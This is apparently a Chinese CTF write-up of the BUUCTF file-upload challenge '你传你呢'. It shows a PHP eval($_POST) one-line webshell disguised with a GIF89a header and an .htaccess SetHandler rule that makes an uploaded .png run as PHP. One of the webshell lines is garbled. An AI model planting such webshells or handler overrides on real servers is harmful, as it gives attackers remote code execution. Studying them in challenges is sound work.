当前位置:   article > 正文

WEB-buuctf-你传你呢_蚁剑能连接html文件

蚁剑能连接html文件

一,制作一句话木马

嵌入php脚本的html中,phtml后缀文件。

GIF89a? 
<script language="php">eval($_POST['pass']);</script>

完全是由php写的一句话木马,php后缀文件

<?php@eval(_POST[‘pass’]);?>

二,上传文件

发现不能绕过检测,更改后缀为png,上传成功

 

 

打开蚁剑测试链连接,返回数据为空

网上查询资料发现这是属于文件解析漏洞,就是更改apache里.htaccess配置.可以将其它类型的文件转化为PHP的文件类型。

三,现在开始编辑一个.htacces文件

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

(注;文件名1.png须和上传的一句话木马文件相同名称。)

上传.htaccess

 

现在就可直接进行蚁剑连接了

 

根目录下找到flag

 

总结;

1,一句话木马php后缀文件,phtml后缀文件,web服务器都会用php解释器解析

区别;

当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马

2,.htaccess

.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

本题中就是利用.htaccess更改文件扩展名的方式来将1.png变为1.php文件,使其运行来让我们获得webshell,进而获得flag

3.php对上传文件的检测

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/AllinToyou/article/detail/560255
推荐阅读
相关标签
  

闽ICP备14008679号